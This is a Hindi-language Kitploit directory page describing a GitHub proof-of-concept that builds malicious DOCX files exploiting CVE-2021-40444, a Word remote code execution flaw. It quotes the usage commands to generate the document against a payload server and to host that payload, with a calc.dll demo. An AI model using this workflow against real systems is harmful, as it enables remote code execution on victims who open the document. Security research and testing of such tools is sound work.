Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx — दुर्भावनापूर्ण DOCX दस्तावेज़ उत्पन्न करता है जो CVE-2021-40444 (Microsoft Office Word RCE) का शोषण करते हैं, साथ ही पेलोड को होस्ट करने के लिए एक अंतर्निहित HTTP सर्वर के साथ। | Kitploit
उपकरण/GitHubGitHub/w1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणकमांड एंड कंट्रोल
GitHubw1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx

Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx

दुर्भावनापूर्ण DOCX दस्तावेज़ उत्पन्न करता है जो CVE-2021-40444 (Microsoft Office Word RCE) का शोषण करते हैं, साथ ही पेलोड को होस्ट करने के लिए एक अंतर्निहित HTTP सर्वर के साथ।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

CVE-2021-40444 प्रमाण-अवधारणा

CVE-2021-40444 (Microsoft Office Word रिमोट कोड निष्पादन) का शोषण करने के लिए दुर्भावनापूर्ण docx जनरेटर

इस स्क्रिप्ट का निर्माण जंगल में उपयोग किए गए नमूने पर किए गए कुछ रिवर्स इंजीनियरिंग पर आधारित है: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx फ़ाइल)

आपको पहले lcab स्थापित करना होगा (sudo apt-get install lcab)

मैन्युअल पुनरुत्पादन चरणों के लिए REPRODUCE.md देखें

यदि आपका उत्पन्न cab काम नहीं कर रहा है, तो exploit.html URL को calc.cab पर इंगित करने का प्रयास करें

उपयोग

पहले एक DLL दिए जाने पर एक दुर्भावनापूर्ण docx दस्तावेज़ उत्पन्न करें, आप test/calc.dll पर उपलब्ध DLL का उपयोग कर सकते हैं जो system() कॉल से calc.exe चलाता है

python3 exploit.py generate test/calc.dll http://<SRV IP>

दस्तावेज़ निर्माण

एक बार जब आप दुर्भावनापूर्ण docx उत्पन्न कर लेते हैं (यह out/ पर होगा) तो आप सर्वर सेट कर सकते हैं:

sudo python3 exploit.py host 80

सर्वर

अंत में, विंडोज वर्चुअल मशीन में docx आज़माएं:

कैल्क पॉप अप

टूल डाउनलोड करें